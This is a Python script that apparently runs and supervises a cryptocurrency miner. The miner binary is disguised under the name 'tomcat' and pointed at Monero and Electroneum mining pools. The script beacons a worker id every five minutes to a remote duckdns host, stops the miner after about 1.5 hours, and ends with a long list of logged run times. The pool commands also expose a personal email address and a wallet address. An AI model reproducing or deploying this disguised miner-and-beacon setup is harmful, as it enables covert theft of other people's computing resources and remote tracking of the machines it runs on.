import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:07:07.039215
#2018-02-17 15:54:03.274449
#2018-02-17 17:41:07.412880
#2018-02-17 19:28:06.238370
#2018-02-17 21:19:01.261715
#2018-02-17 23:02:06.075500
#2018-02-18 00:49:07.340938
#2018-02-18 02:36:03.560968
#2018-02-18 04:23:07.218120
#2018-02-18 06:14:07.469710
#2018-02-18 08:04:06.718741
#2018-02-18 09:51:06.910245
#2018-02-18 11:38:06.329486
#2018-02-18 13:23:05.452250
#2018-02-18 15:13:04.893572
#2018-02-18 17:02:05.746911
#2018-02-18 18:48:07.040690
#2018-02-18 20:36:05.076010
#2018-02-18 22:21:05.647635
#2018-02-19 00:10:08.213231
#2018-02-19 01:57:06.066717
#2018-02-19 03:44:04.235643
#2018-02-19 05:29:03.840013
#2018-02-19 07:16:03.581910
#2018-02-19 09:04:07.953500
#2018-02-19 10:51:07.658020
#2018-02-19 12:41:07.440120
#2018-02-19 14:28:05.007645
#2018-02-19 16:16:07.419535
#2018-02-19 18:04:08.175473
#2018-02-19 19:50:05.796212
#2018-02-19 21:37:01.788676
#2018-02-19 23:23:06.462954
#2018-02-20 01:09:01.593125
#2018-02-20 02:57:07.042326
#2018-02-20 04:46:01.623427
#2018-02-20 06:30:02.021969
#2018-02-20 08:14:07.045334
#2018-02-20 09:59:07.661918
#2018-02-20 11:43:07.570931
#2018-02-20 13:31:10.592549
#2018-02-20 15:15:12.344184
#2018-02-20 16:59:13.764351
#2018-02-20 18:47:01.823315
#2018-02-20 20:37:05.069682
#2018-02-20 22:21:06.116518
#2018-02-21 00:02:04.801804
#2018-02-21 01:47:01.805771
#2018-02-21 03:37:06.583759
#2018-02-21 05:26:06.178154
#2018-02-21 07:14:05.424809
#2018-02-21 09:00:05.428963
#2018-02-21 10:49:01.771649
#2018-02-21 12:37:07.574636
#2018-02-21 14:23:07.896316
#2018-02-21 16:11:05.691813
#2018-02-21 18:01:07.990960
#2018-02-21 19:50:05.646512
#2018-02-21 21:36:06.933284
#2018-02-21 23:25:03.597078
#2018-02-22 01:13:04.857795
#2018-02-22 03:02:05.781007
#2018-02-22 04:46:08.126549
#2018-02-22 06:30:07.362736
#2018-02-22 08:17:04.377771
#2018-02-22 10:06:07.233233
#2018-02-22 11:51:13.313079
#2018-02-22 13:37:05.511755
#2018-02-22 15:25:07.977412
#2018-02-22 17:11:07.831276
#2018-02-22 18:57:02.266192
#2018-02-22 20:49:04.412152
#2018-02-22 22:36:05.823583
#2018-02-23 00:23:04.951060
#2018-02-23 02:11:07.268749
#2018-02-23 03:56:01.564660
#2018-02-23 05:43:07.608895
#2018-02-23 07:28:03.983704
#2018-02-23 09:32:01.861666
#2018-02-23 11:37:06.340161
#2018-02-23 13:25:05.081263
#2018-02-23 15:11:05.373116
#2018-02-23 17:01:08.059268
#2018-02-23 18:49:07.438114
#2018-02-23 20:36:05.293908
#2018-02-23 22:23:06.971916
#2018-02-24 00:08:08.990454
#2018-02-24 01:59:01.611558
#2018-02-24 03:50:10.115576
#2018-02-24 05:39:01.922711
#2018-02-24 07:29:05.507391
#2018-02-24 09:16:06.357920
#2018-02-24 11:12:06.289167
#2018-02-24 13:02:01.545741
#2018-02-24 14:49:06.649457
#2018-02-24 16:41:08.014281
#2018-02-24 18:30:06.796319
#2018-02-24 20:17:03.327176
#2018-02-24 22:10:08.790236
#2018-02-25 01:07:05.262073
#2018-02-25 03:58:07.969321
#2018-02-25 07:37:05.873236